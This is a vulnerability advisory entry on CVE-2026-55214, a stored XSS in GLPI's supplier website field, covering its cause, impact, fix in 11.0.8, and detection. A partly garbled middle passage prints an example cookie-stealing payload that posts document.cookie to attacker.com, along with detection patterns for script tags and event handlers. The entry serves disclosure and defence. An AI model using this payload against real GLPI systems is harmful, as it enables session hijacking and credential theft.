
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-55214 is a stored cross-site scripting (XSS) vulnerability in GLPI, a free open-source IT asset management platform. An authenticated technician can inject malicious markup into supplier website fields; the payload executes in the browser of any user who subsequently opens the affected item's suppliers list. The vulnerability affects GLPI versions 11.0.6 through 11.0.7 (i.e., >= 11.0.6, < 11.0.8) and was disclosed on July 27, 2026, with a fix released in version 11.0.8. It carries a CVSS v4.0 base score of 8.5 (High) (GitHub Advisory, GLPI Release).
The root cause is improper encoding or escaping of output (CWE-116): in src/Contact_Supplier.php and src/Contract_Supplier.php, the supplier website field value was rendered directly into HTML without applying htmlescape() when the field contained no URL (i.e., when the website URL was an empty string), allowing raw markup to pass through to the page. The fix, applied in commit 970786e, adds htmlescape() to the else branch so that the raw field value is always HTML-encoded before rendering (GitHub Commit). Exploitation requires an authenticated account with technician-level privileges to write to supplier records, and victim interaction (opening the suppliers list) to trigger the payload (GitHub Advisory).
Successful exploitation allows the injected JavaScript to execute in the security context of any GLPI user who views the suppliers list, enabling session hijacking, credential theft, or unauthorized actions performed on behalf of the victim. Because the payload persists in the database and fires for every user who loads the affected view, a single malicious technician account can broadly impact all users — including administrators — who access supplier records. Confidentiality, integrity, and availability of the vulnerable system are all rated High in the CVSS v4.0 assessment (GitHub Advisory).
No public proof-of-concept exploit code has been identified, and there is no evidence of active in-the-wild exploitation at this time (Feedly). The EPSS score is approximately 0.0028 (0.28%), indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is limited by the requirement for an authenticated technician account, reducing the attack surface compared to unauthenticated vulnerabilities.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the Website field, leaving it as a non-URL value so the vulnerable code path (missing htmlescape()) is triggered./front/supplier.form.php) containing HTML or JavaScript tags (<script>, onerror=, javascript:) in the website parameter.glpi_suppliers table, website column) containing raw HTML or JavaScript markup rather than a valid URL.attacker.com/steal?c=<session_token>) originating from GLPI users' browsers.The primary remediation is to upgrade GLPI to version 11.0.8 or later, which applies htmlescape() to the supplier website field in both Contact_Supplier.php and Contract_Supplier.php (GLPI Release, GitHub Commit). As a temporary workaround prior to patching, restrict technician-role permissions to prevent modification of supplier website fields, and deploy a web application firewall (WAF) rule to detect and block HTML/JavaScript content in supplier form submissions. Organizations should also audit existing supplier records for malicious content in the website field.
The GLPI project team published the security advisory (GHSA-8v8p-w8mq-wqcg) on July 27, 2026, and included the fix in the 11.0.8 security release, which addressed 16 CVEs in total — including two critical-severity issues — making it a significant security update (GLPI Release). The release received positive community engagement on GitHub (19 reactions). No notable independent researcher commentary or broader media coverage specific to CVE-2026-55214 has been identified.
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."